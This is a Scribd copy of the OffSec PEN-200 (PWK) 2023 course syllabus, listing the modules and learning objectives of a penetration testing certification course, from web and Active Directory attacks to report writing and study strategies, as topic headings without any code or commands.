0% found this document useful (0 votes)
2K views20 pages

OSCP Syllabus 2023 Update

Uploaded by

Ezio Auditore
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
2K views20 pages

OSCP Syllabus 2023 Update

Uploaded by

Ezio Auditore
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 20

PEN-200 (PWK) Syllabus

PEN-200 (PWK) Syllabus

Learning Module Learning Units Learning Objectives

Penetration Testing Welcome to PWK ● Take inventory over what’s included in the
with Kali Linux : course
General Course
Introduction
● Set up an Attacking Kali VM

● Connect to and interact over the PWK VPN

● Understand how to complete Module


Exercises

How to Approach the ● Conceptualize a learning model based on


Course increasing uncertainty

● Understand the different learning


components included in PEN-200

Summary of PWK Learning ● Obtain a high level overview of what’s


Modules covered in each PEN-200 Learning Module

Introduction to The Practice of ● Recognize the challenges unique to


Cybersecurity Cybersecurity information security

● Understand how "offensive" and


"defensive" security reflect each other

● Begin to build a mental model of useful


mindsets applicable to information
security

Threats and Threat Actors ● Understand how attackers and defenders


learn from each other

● Understand the differences between risks,


threats, vulnerabilities, and exploits

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 1 of 20


PEN-200 (PWK) Syllabus

Introduction to Threats and Threat Actors ● List and describe different classes of
Cybersecurity threat actor

● Recognize some recent cybersecurity


attacks

The CIA Triad ● Understand why it's important to protect


the confidentiality of information

● Learn why it's important to protect the


integrity of information

● Explore why it's important to protect the


availability of information

Security Principles, Controls, ● Understand the importance of multiple


and Strategies layers of defense in a security strategy

● Describe threat intelligence and its


applications in an organization

● Learn why access and user privileges


should be restricted as much as possible

● Understand why security should not


depend on secrecy

● Identify policies that can mitigate threats


to an organization

● Determine which controls an organization


can use to mitigate cybersecurity threats

Cybersecurity Laws, ● Gain a broad understanding of various


Regulations, Standards, and legal and regulatory issues surrounding
Frameworks cybersecurity

● Understand different frameworks and


standards that help organizations orient
their cybersecurity activities

Career Opportunities in ● Identify career opportunities in


Cybersecurity cybersecurity

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 2 of 20


PEN-200 (PWK) Syllabus

Effective Learning Learning Theory ● Understand the general state of our


Strategies understanding about education and
education theory

● Understand the basics of memory


mechanisms and dual encoding

● Recognize some of the problems faced by


learners, including "The Curve of
Forgetting" and cognitive load

Unique Challenges to ● Recognize the differences and advantages


Learning Technical Skills of digital learning materials

● Understand the challenge of preparing for


unknown scenarios

● Understand the potential challenges of


remote or asynchronous learning

OffSec Methodology ● Understand what is meant by a


Demonstrative Methodology

● Understand the challenge of preparing for


unknown scenarios

● Understand the potential challenges of


remote or asynchronous learning

Case Study: ● Review a sample of learning material about


chmod -x chmod the executable permission, expand beyond
the initial information set, and work
through a problem

● Understand how OffSec's approach to


teaching is reflected in the sample material

Tactics and Common ● Learn about Retrieval Practice


Methods

● Understand Spaced Practice

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 3 of 20


PEN-200 (PWK) Syllabus

Effective Learning Tactics and Common ● Explore the SQ3R and PQ4R Method
Strategies Methods

● Examine the Feynman Technique

● Understand the Leitner System

Advice and Suggestions on ● Develop strategies for dealing with


Exams exam-related stress

● Recognize when you might be ready to


take the exam

● Understand a practical approach to exams

Practical Steps ● Create a long term strategy

● Understand how to use a time allotment


strategy

● Learn how and when to narrow your focus

● Understand the importance of a group of


co-learners and finding a community

● Explore how best to pay attention and


capitalize on our own successful learning
strategies

Report Writing for Understanding Note-Taking ● Review the deliverables for penetration
Penetration Testers testing engagements

● Understand the importance of note


portability

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 4 of 20


PEN-200 (PWK) Syllabus

Report Writing for Understanding Note-Taking ● Identify the general structure of pentesting
Penetration Testers documentation

● Choose the right note-taking tool

● Understand the importance of taking


screenshots

● Use tools to take screenshots

Writing Effective Technical ● Identify the purpose of a technical report


Penetration Testing Reports

● Understand how to specifically tailor


content

● Construct an Executive Summary

● Account for specific test environment


considerations

● Create a technical summary

● Describe technical findings and


recommendations

● Recognize when to use appendices,


resources, and references

Information Gathering The Penetration Testing ● Understand the stages of a Penetration


Lifecycle Test

● Learn the role of Information Gathering


inside each stage

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 5 of 20


PEN-200 (PWK) Syllabus

Information Gathering The Penetration Testing ● Understand the differences between


Lifecycle Active and Passive Information Gathering

Passive Information ● Understand the two different Passive


Gathering Information Gathering approaches

● Learn about Open Source Intelligence


(OSINT)

● Understand Web Server and DNS passive


information gathering

Active Information Gathering ● Learn to perform Netcat and Nmap port


scanning

● Conduct DNS, SMB, SMTP, and SNMP


Enumeration

● Understand Living off the Land


Techniques

Vulnerability Scanning Vulnerability Scanning ● Gain a basic understanding of the


Theory Vulnerability Scanning process

● Learn about the different types of


Vulnerability Scans

● Understand the considerations of a


Vulnerability Scan

Vulnerability Scanning with ● Install Nessus


Nessus

● Understand the different Nessus


Components

● Configure and perform a vulnerability scan

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 6 of 20


PEN-200 (PWK) Syllabus

Vulnerability Scanning Vulnerability Scanning with ● Understand and work with the results of a
Nessus vulnerability scan with Nessus

● Provide credentials to perform an


authenticated vulnerability scan

● Gain a basic understanding of Nessus


Plugins

Vulnerability Scanning with ● Understand the basics of the Nmap


Nmap Scripting Engine (NSE)

● Perform a lightweight Vulnerability Scan


with Nmap

● Work with custom NSE scripts

Introduction to Web Application ● Understand web application security


Web Applications Assessment Methodology testing requirements

● Learn different types of methodologies of


web application testing

● Learn about the OWASP Top10 and most


common web vulnerabilities

Web Application ● Perform common enumeration techniques


Assessment Tools on web applications

● Understand Web Proxies theory

● Learn how Burp Suite proxy works for web


application testing

Web Application ● Learn how to debug Web Application


Enumeration source code

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 7 of 20


PEN-200 (PWK) Syllabus

Introduction to Web Application ● Understand how to enumerate and inspect


Web Applications Enumeration Headers, Cookies, and Source Code

● Learn how to conduct API testing


methodologies

Cross-Site Scripting (XSS) ● Understand Cross-Site Scripting


vulnerability types

● Exploit basic Cross-Site Scripting

● Perform Privilege Escalation via Cross-Site


Scripting

Common Web Directory Traversal ● Understand absolute and relative paths


Application Attacks

● Learn how to exploit directory traversal


vulnerabilities

● Use encoding for special characters

File Inclusion Vulnerabilities ● Learn the difference between File


Inclusion and Directory Traversal
vulnerabilities

● Gain an understanding of File Inclusion


vulnerabilities

● Understand how to leverage Local File


Inclusion (LFI to obtain code execution

● Explore PHP Wrapper usage

● Learn how to perform Remote File


Inclusion (RFI) attacks

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 8 of 20


PEN-200 (PWK) Syllabus

Common Web File Upload Vulnerabilities ● Understand File Upload Vulnerabilities


Application Attacks

● Learn how to identify File Upload


vulnerabilities

File Upload Vulnerabilities ● Explore different vectors to exploit File


Upload vulnerabilities

Command Injection ● Learn about command injection in web


applications

● Use operating system commands for OS


command injection

● Understand how to leverage command


injection to gain system access

SQL Injection Attacks SQL Theory and Database ● Refresh SQL theory fundamentals
Types

● Learn different DB types

● Understand different SQL syntax

Manual SQL Exploitation ● Manually identify SQL injection


vulnerabilities

● Understand UNION SQLi payloads

● Learn about Error SQLi payloads

● Understand Blind SQLi payloads

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 9 of 20


PEN-200 (PWK) Syllabus

SQL Injection Attacks Manual and Automated ● Exploit MSSQL Databases with
Code Execution xp_cmdshell

● Automate SQL Injection with SQLmap

Client-Side Attacks Target Reconnaissance ● Gather information to prepare client-side


attacks

● Leverage client fingerprinting to obtain


information

Exploiting Microsoft Office ● Understand variations of Microsoft Office


client-side attacks

● Install Microsoft Office

● Leverage Microsoft Word Macros

Abusing Windows Library ● Prepare an attack with Windows library


Files files

● Leverage Windows shortcuts to obtain


code execution

Locating Public Getting Started ● Understand the risk of executing untrusted


Exploits exploits

● Understand the importance of analyzing


the exploit code before execution

Online Exploit Resources ● Access multiple online exploit resources

● Differentiate between various online


exploit resources

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 10 of 20


PEN-200 (PWK) Syllabus

● Understand the risks between online


exploit resources

● Use Google search operators to discover


public exploits

Locating Public Offline Exploit Resources ● Access Multiple Exploit Frameworks


Exploits

● Use SearchSploit

● Use Nmap NSE Scripts

Exploiting a Target ● Follow a basic penetration test workflow to


enumerate a target system

● Completely exploit a machine that is


vulnerable to public exploits

● Discover appropriate exploits for a target


system

● Execute a public exploit to gain a limited


shell on a target host

Fixing Exploits Fixing Memory Corruption ● Understand high-level buffer overflow


Exploits theory

● Cross-compile binaries

● Modify and update memory corruption


exploits

Fixing Web Exploits ● Fix Web application exploits

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 11 of 20


PEN-200 (PWK) Syllabus

● Troubleshoot common web application


exploit issues

Antivirus Evasion Antivirus Evasion Software ● Recognize known vs unknown threats


Key Components and
Operations

● Understand AV key components

● Understand AV detection engines

AV Evasion in Practice ● Understand antivirus evasion testing best


practices

● Manually evade AV solutions

● Leverage automated tools for AV evasion

Password Attacks Attacking Network Services ● Attack SSH and RDP Logins
Logins

● Attack HTTP POST login forms

Password Cracking ● Understand the fundamentals of password


Fundamentals cracking

● Mutate Wordlists

● Explain the basic password cracking


methodology

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 12 of 20


PEN-200 (PWK) Syllabus

● Attack password manager key files

● Attack the passphrase of SSH private keys

Password Attacks Working with Password ● Obtain and crack NTLM hashes
Hashes

● Pass NTLM hashes

● Obtain and crack Net-NTLMv2 hashes

● Relay Net-NTLMv2 hashes

Windows Privilege Enumerating Windows ● Understand Windows privileges and access


Escalation control mechanisms

● Obtain situational awareness

● Search for sensitive information on Windows


systems

● Find sensitive information generated by


PowerShell

● Become familiar with automated enumeration


tools

Leveraging Windows ● Hijack service binaries


Services

● Hijack service DLLs

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 13 of 20


PEN-200 (PWK) Syllabus

● Abuse Unquoted service paths

Windows Privilege Abusing other Windows ● Leverage Scheduled Tasks to elevate our
Escalation Components privileges

● Understand the different types of exploits


leading to privilege escalation

● Abuse privileges to execute code as


privileged user accounts

Linux Privilege Enumerating Linux ● Understand files and user privileges on Linux
Escalation

● Perform manual enumeration

● Conduct automated enumeration

Exposed Confidential ● Understand user history files


Information

● Inspect user trails for credential harvesting

● Inspect system trails for credential


harvesting

Insecure File Permissions ● Abuse insecure cron jobs to escalate


privileges

● Abuse Insecure file permissions to escalate


privileges

Insecure System ● Abuse SUID programs and capabilities for


Components privilege escalation

● Circumvent special sudo permissions to

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 14 of 20


PEN-200 (PWK) Syllabus

escalate privileges

Linux Privilege Insecure System ● Enumerate the system’s kernel for known
Escalation Components vulnerabilities, then abuse them for privilege
escalation

Port Redirection and Port Forwarding with *NIX ● Learn about port forwarding
SSH Tunneling Tools

● Understand why and when to use port


forwarding

● Use Socat for port forwarding

SSH Tunneling ● Learn about SSH tunneling

● Understand how to perform SSH local port


forwarding

● Understand how to perform SSH dynamic


port forwarding

● Understand how to perform SSH remote port


forwarding

● Understand how to perform SSH remote


dynamic port forwarding

Port Forwarding with ● Understand port forwarding and tunneling


Windows Tools with ssh.exe on Windows

● Understand port forwarding and tunneling


with Plink

● Understand port forwarding with Netsh

Advanced Tunneling Tunneling Through Deep ● Learn about HTTP tunneling


Packet Inspection

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 15 of 20


PEN-200 (PWK) Syllabus

● Perform HTTP tunneling with Chisel

● Learn about DNS tunneling

● Perform DNS tunneling with dnscat

The Metasploit Getting Familiar with ● Setup and navigate Metasploit


Framework Metasploit

● Use auxiliary modules

● Leverage exploit modules

Using Metasploit Payloads ● Understand the differences between staged


and non-staged payloads

● Explore the Meterpreter payload

● Create executable payloads

Performing ● Use core Meterpreter post-exploitation


Post-Exploitation with features
Metasploit
● Use post-exploitation modules

● Perform pivoting with Metasploit

The Metasploit Automating Metasploit ● Create resource scripts


Framework

● Use resource scripts in Metasploit

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 16 of 20


PEN-200 (PWK) Syllabus

Active Directory Active Directory Manual ● Enumerate Active Directory using legacy
Introduction and Enumeration Windows applications
Enumeration

● Use PowerShell and .NET to perform


additional AD enumeration

Manual Enumeration ● Enumerate Operating Systems Permissions


Expanding our Repertoire and logged on users

● Enumerate Through Service Principal Names

● Enumerate Object Permissions

● Explore Domain Shares

Active Directory ● Collect domain data using SharpHound


Automated Enumeration

● Analyze domain data using BloodHound

Attacking Active Understanding Active ● Understand NTLM Authentication


Directory Directory Authentication
Authentication

● Understand Kerberos Authentication

● Become familiar with cached AD Credentials

Attacking Active Performing Attacks on ● Use password attacks to obtain valid user
Directory Active Directory credentials
Authentication Authentication

● Abuse the enabled use account options

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 17 of 20


PEN-200 (PWK) Syllabus

● Abuse the Kerberos SPN authentication


mechanism

● Forge service tickets

● Impersonate a domain controller to retrieve


any domain user credentials

Lateral Movement in Active Directory LAteral ● Understand WMI, WinRS, and WinRM lateral
Active Directory Movement Techniques movement techniques

● Abuse PsExec for lateral movement

● Learn about Pass The Hash and Overpass


The Hash as lateral movement techniques

● Misuse DCOM to move laterally

Active Directory ● Understand the general purpose of


Persistence persistence techniques

● Leverage golden tickets as a persistence


attack

● Learn about shadow copies and how they


can be abused for persistence

Assembling the Pieces Enumerating the Public ● Enumerate machines on a public network
Network

● Obtain useful information to utilize for later


attacks

Attacking WEBSRV1 ● Utilize vulnerabilities in WordPress Plugins

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 18 of 20


PEN-200 (PWK) Syllabus

● Crack the passphrase of a SSH private key

● Elevate privileges using sudo commands

● Leverage developer artifacts to obtain


sensitive information

Gaining Access to the ● Validate domain credentials from a


Internal Network non-domain-joined machine

● Perform phishing to get access to internal


network

Enumerating the Internal ● Gain situational awareness in a network


Network

● Enumerate hosts, services, and sessions in a


target network

● Identify attack vectors in target network

Attacking the Web ● Perform Kerberoasting


Application on
INTERNALSRV1

● Abuse a WordPress Plugin function for a


Relay attack

Gaining Access to the ● Gather information to prepare client-side


Domain Controller attacks

● Leverage client fingerprinting to obtain


information

Trying Harder: The PWK Challenge Lab ● Learn about the different kinds of Challenge
Labs Overview Labs

● Obtain a high level overview of each scenario

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 19 of 20


PEN-200 (PWK) Syllabus

● Understand how to treat the mock OSCP


Challenge Labs

Challenge Lab Details ● Understand how to think about the concept


of dependency

● Understand the lack of meaning inherent to


IP address ordering

● Learn about the concept of “decoy”


machines

● Learn how Routers and Network Address


Translation affect the scenarios

● Understand how to treat the credentials and


password attacks

The OSCP Exam ● Learn about the OSCP Certification Exam


Information

PWK v3.0 - Copyright ©2023 OffSec Ltd. All rights reserved. 20 of 20

You might also like